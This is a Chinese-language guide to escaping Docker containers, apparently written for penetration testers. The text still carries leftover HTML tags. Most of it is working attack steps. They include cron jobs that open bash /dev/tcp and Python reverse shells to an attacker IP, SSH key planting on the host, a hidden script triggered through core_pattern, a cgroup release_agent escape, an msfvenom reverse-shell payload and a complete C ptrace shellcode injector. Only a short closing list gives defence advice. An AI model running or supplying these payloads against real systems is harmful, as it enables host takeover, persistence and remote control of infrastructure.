Docker 逃逸技术全面指南<\/h1>

一、Docker 环境判断<\/h2>

1. 检查
.dockerenv<\/code> 文件<\/h3>

路径：\/.dockerenv<\/code><\/li>
存在此文件通常表明当前处于 Docker 容器中<\/li>
<\/ul>
2. 检查 \/proc\/1\/cgroup<\/code><\/h3>

命令：cat \/proc\/1\/cgroup<\/code><\/li>
如果输出中包含明显的 docker<\/code> 标识，则表明处于 Docker 容器中<\/li>
<\/ul>
3. 检查环境变量<\/h3>

命令：hostname<\/code><\/li>
Docker 容器的主机名通常会带有容器相关的标识（如容器ID）<\/li>
<\/ul>
二、特权模式逃逸<\/h2>
1. 判断特权模式<\/h3>

命令：cat \/proc\/self\/status | grep CapEff<\/code><\/li>
特权模式特征：CapEff 掩码值为 0000003fffffffff<\/code> 或 0000001fffffffff<\/code><\/li>
<\/ul>
2. 利用步骤<\/h3>

列出磁盘设备：fdisk -l<\/code><\/li>
创建挂载目录：mkdir \/meteorkai<\/code><\/li>
挂载宿主机磁盘：mount \/dev\/vda1 \/meteorkai<\/code><\/li>
<\/ol>
3. 逃逸方法<\/h3>
方法一：定时任务反弹shell<\/h4>

写入定时任务：
echo 'SHELL=\/bin\/bash'<\/span> > \/meteorkai\/var\/spool\/cron\/crontabs\/root
<\/span><\/span>echo '* * * * * \/bin\/bash -i >& \/dev\/tcp\/攻击机IP\/端口 0>&1'<\/span> >> \/meteorkai\/var\/spool\/cron\/crontabs\/root
<\/span><\/span><\/code><\/pre><\/li>
设置权限：chmod 600 \/meteorkai\/var\/spool\/cron\/crontabs\/root<\/code><\/li>
<\/ol>
注意事项<\/strong>：<\/p>

不同Linux发行版定时任务路径不同：

\/var\/spool\/cron<\/code>：Debian、Ubuntu、CentOS、RedHat等<\/li>
\/etc\/crontabs<\/code>：Alpine Linux等轻量级发行版<\/li>
<\/ul>
<\/li>
Cron默认使用\/bin\/sh<\/code>（dash），不支持\/dev\/tcp<\/code>，需指定SHELL=\/bin\/bash<\/code><\/li>
<\/ul>
方法二：Python反弹shell<\/h4>
echo '* * * * * \/usr\/bin\/python3 -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"攻击机IP\",端口));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"\/bin\/bash\",\"-i\"])"'<\/span> >> \/meteorkai\/var\/spool\/cron\/crontabs\/root
<\/span><\/span><\/code><\/pre>方法三：写入SSH公钥<\/h4>

生成密钥对：ssh-keygen -t rsa -b 4096 -f my_key -N ""<\/code><\/li>
写入公钥：cat my_key.pub >> \/meteorkai\/root\/.ssh\/authorized_keys<\/code><\/li>
使用私钥连接：ssh -i my_key root@宿主机IP<\/code><\/li>
<\/ol>
三、Docker API未授权逃逸<\/h2>
1. 判断漏洞<\/h3>

访问 http:\/\/目标IP:2375\/version<\/code> 或 http:\/\/目标IP:2375\/info<\/code><\/li>
如果返回Docker信息则存在漏洞<\/li>
<\/ul>
2. 利用方法<\/h3>
docker -H tcp:\/\/目标IP:2375 run --rm --privileged -it -v \/:\/mnt busybox chroot \/mnt sh
<\/span><\/span><\/code><\/pre>
--privileged<\/code>：获取真正的root权限<\/li>
-v \/:\/mnt<\/code>：挂载宿主机根目录到容器\/mnt目录<\/li>
chroot \/mnt sh<\/code>：切换根目录到宿主机文件系统<\/li>
<\/ul>
四、Docker Socket逃逸<\/h2>
1. 判断条件<\/h3>

检查 \/var\/run\/docker.sock<\/code> 是否存在<\/li>
<\/ul>
2. 利用步骤<\/h3>

安装Docker客户端（如不存在）<\/li>
创建新容器并挂载宿主机根目录：
docker run -it -v \/:\/mnt --privileged=<\/span>true alpine
<\/span><\/span><\/code><\/pre><\/li>
通过挂载的目录进行权限维持（如写入定时任务或SSH公钥）<\/li>
<\/ol>
五、Procfs危险挂载逃逸<\/h2>
1. 判断条件<\/h3>

查找core_pattern文件：find \/ -name core_pattern<\/code><\/li>
如果找到两个core_pattern文件，则可能挂载了宿主机的procfs<\/li>
<\/ul>
2. 利用步骤<\/h3>

确定容器在宿主机上的绝对路径：

查找\/var\/lib\/docker\/overlay2\/<\/code>下的merged<\/code>目录<\/li>
<\/ul>
<\/li>
创建恶意脚本（如.meteor.py<\/code>）并赋权：
echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("攻击机IP",端口));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["\/bin\/bash","-i"])'<\/span> > \/tmp\/.meteor.py
<\/span><\/span>chmod 777<\/span> \/tmp\/.meteor.py
<\/span><\/span><\/code><\/pre><\/li>
修改core_pattern：
echo -e "|\/var\/lib\/docker\/overlay2\/容器ID\/merged\/tmp\/.meteor.py\rcore "<\/span> > \/挂载点\/proc\/sys\/kernel\/core_pattern
<\/span><\/span><\/code><\/pre><\/li>
触发崩溃执行恶意脚本<\/li>
<\/ol>
六、Cgroup配置错误逃逸（cgroup-v1）<\/h2>
1. 利用条件<\/h3>

以root用户运行<\/li>
具有SYS_ADMIN权限<\/li>
未配置AppArmor<\/li>
cgroup v1以读写方式挂载<\/li>
<\/ul>
2. 利用步骤<\/h3>

创建并挂载cgroup：
mkdir \/tmp\/meteorkai
<\/span><\/span>mount -t cgroup -o memory cgroup \/tmp\/meteorkai
<\/span><\/span><\/code><\/pre><\/li>
创建子目录并启用通知：
mkdir \/tmp\/meteorkai\/conf
<\/span><\/span>echo 1<\/span> > \/tmp\/meteorkai\/conf\/notify_on_release
<\/span><\/span><\/code><\/pre><\/li>
获取宿主机路径：
host_path=<\/span>`<\/span>sed -n 's\/.*\perdir=$[^,]*$.*\/\1\/p'<\/span> \/etc\/mtab`<\/span>
<\/span><\/span><\/code><\/pre><\/li>
设置release_agent：
echo "<\/span>$host_path\/cmd"<\/span> > \/tmp\/meteorkai\/release_agent
<\/span><\/span><\/code><\/pre><\/li>
创建恶意脚本：
echo '#!\/bin\/sh'<\/span> > \/cmd
<\/span><\/span>echo '\/bin\/bash -i >& \/dev\/tcp\/攻击机IP\/端口 0>&1'<\/span> >> \/cmd
<\/span><\/span>chmod 777<\/span> \/cmd
<\/span><\/span><\/code><\/pre><\/li>
触发执行：
sh -c "echo \$\$ > \/tmp\/meteorkai\/conf\/cgroup.procs"<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
七、SYS_PTRACE进程注入逃逸<\/h2>
1. 利用条件<\/h3>

具有SYS_PTRACE权限：capsh --print | grep cap_sys_ptrace<\/code><\/li>
与宿主机共享进程命名空间：ps aux | grep dockerd<\/code>能看到宿主机进程<\/li>
以root权限运行<\/li>
<\/ul>
2. 利用步骤<\/h3>

生成shellcode：
msfvenom -p linux\/x64\/shell_reverse_tcp LHOST=<\/span>攻击机IP LPORT=<\/span>端口 -f c
<\/span><\/span><\/code><\/pre><\/li>
编译注入程序（infect.c）：
#include<\/span> <stdio.h><\/span>
<\/span><\/span><\/span>#include<\/span> <stdlib.h><\/span>
<\/span><\/span><\/span>#include<\/span> <string.h><\/span>
<\/span><\/span><\/span>#include<\/span> <stdint.h><\/span>
<\/span><\/span><\/span>#include<\/span> <sys\/ptrace.h><\/span>
<\/span><\/span><\/span>#include<\/span> <sys\/types.h><\/span>
<\/span><\/span><\/span>#include<\/span> <sys\/wait.h><\/span>
<\/span><\/span><\/span>#include<\/span> <unistd.h><\/span>
<\/span><\/span><\/span>#include<\/span> <sys\/user.h><\/span>
<\/span><\/span><\/span>#include<\/span> <sys\/reg.h><\/span>
<\/span><\/span><\/span><\/span>
<\/span><\/span>\/\/ 替换为生成的shellcode
<\/span><\/span><\/span><\/span>const<\/span> char<\/span> *<\/span>shellcode =<\/span> "\x..."<\/span>;
<\/span><\/span>
<\/span><\/span>int<\/span> main<\/span>(int<\/span> argc, char<\/span> **<\/span>argv) {
<\/span><\/span>    pid_t target;
<\/span><\/span>    struct<\/span> user_regs_struct regs;
<\/span><\/span>    int<\/span> syscall;
<\/span><\/span>    long<\/span> dst;
<\/span><\/span>
<\/span><\/span>    if<\/span>(argc !=<\/span> 2<\/span>) {
<\/span><\/span>        printf("Usage: %s <pid><\/span>\n<\/span>"<\/span>, argv[0<\/span>]);
<\/span><\/span>        exit(1<\/span>);
<\/span><\/span>    }
<\/span><\/span>
<\/span><\/span>    target =<\/span> atoi(argv[1<\/span>]);
<\/span><\/span>    printf("+ Tracing process %d<\/span>\n<\/span>"<\/span>, target);
<\/span><\/span>
<\/span><\/span>    if<\/span>(ptrace(PTRACE_ATTACH, target, NULL, NULL) <<\/span> 0<\/span>) {
<\/span><\/span>        perror("ptrace(ATTACH)"<\/span>);
<\/span><\/span>        exit(1<\/span>);
<\/span><\/span>    }
<\/span><\/span>
<\/span><\/span>    printf("+ Waiting for process...<\/span>\n<\/span>"<\/span>);
<\/span><\/span>    wait(NULL);
<\/span><\/span>
<\/span><\/span>    ptrace(PTRACE_GETREGS, target, NULL, &<\/span>regs);
<\/span><\/span>
<\/span><\/span>    unsigned<\/span> char<\/span> *<\/span>src =<\/span> (char<\/span> *<\/span>)&<\/span>regs.rip;
<\/span><\/span>    memcpy(&<\/span>dst, src, sizeof<\/span>(long<\/span>));
<\/span><\/span>    printf("+ RIP: 0x%lx<\/span>\n<\/span>"<\/span>, dst);
<\/span><\/span>
<\/span><\/span>    printf("+ Injecting shellcode at 0x%lx<\/span>\n<\/span>"<\/span>, dst);
<\/span><\/span>
<\/span><\/span>    int<\/span> i;
<\/span><\/span>    for<\/span>(i =<\/span> 0<\/span>; i <<\/span> strlen(shellcode); i++<\/span>) {
<\/span><\/span>        ptrace(PTRACE_POKETEXT, target, dst +<\/span> i, *<\/span>(long<\/span> *<\/span>)(shellcode +<\/span> i));
<\/span><\/span>    }
<\/span><\/span>
<\/span><\/span>    regs.rip +=<\/span> 2<\/span>;
<\/span><\/span>    ptrace(PTRACE_SETREGS, target, NULL, &<\/span>regs);
<\/span><\/span>    ptrace(PTRACE_DETACH, target, NULL, NULL);
<\/span><\/span>
<\/span><\/span>    printf("+ Done!<\/span>\n<\/span>"<\/span>);
<\/span><\/span>    return<\/span> 0<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre><\/li>
查找目标进程（如\/bin\/bash）<\/li>
执行注入：.\/infect 目标PID<\/code><\/li>
<\/ol>
八、容器\/内核漏洞利用<\/h2>
1. 使用CDK工具<\/h3>

上传CDK到容器<\/li>
信息收集：.\/cdk_linux_amd64 evaluate<\/code><\/li>
挂载宿主机磁盘：.\/cdk_linux_amd64 run mount-disk<\/code><\/li>
通过挂载目录进行权限维持<\/li>
<\/ol>
2. 常见漏洞<\/h3>

CVE-2019-5736（runc漏洞）<\/li>
CVE-2021-30465（容器逃逸漏洞）<\/li>
CVE-2022-0492（cgroups漏洞）<\/li>
<\/ul>
九、防御建议<\/h2>

避免使用--privileged<\/code>特权模式<\/li>
限制容器能力：--cap-drop=ALL --cap-add=必要的<\/code><\/li>
使用只读文件系统：--read-only<\/code><\/li>
配置AppArmor或SELinux<\/li>
禁止挂载敏感目录（如\/proc、\/sys）<\/li>
定期更新Docker和内核版本<\/li>
保护Docker API和Socket（设置认证和权限）<\/li>
监控容器异常行为<\/li>
<\/ol>
通过以上技术，渗透测试人员可以全面评估Docker环境的安全性，发现潜在的容器逃逸风险。在实际测试中，应根据目标环境选择最适合的逃逸方法。<\/p>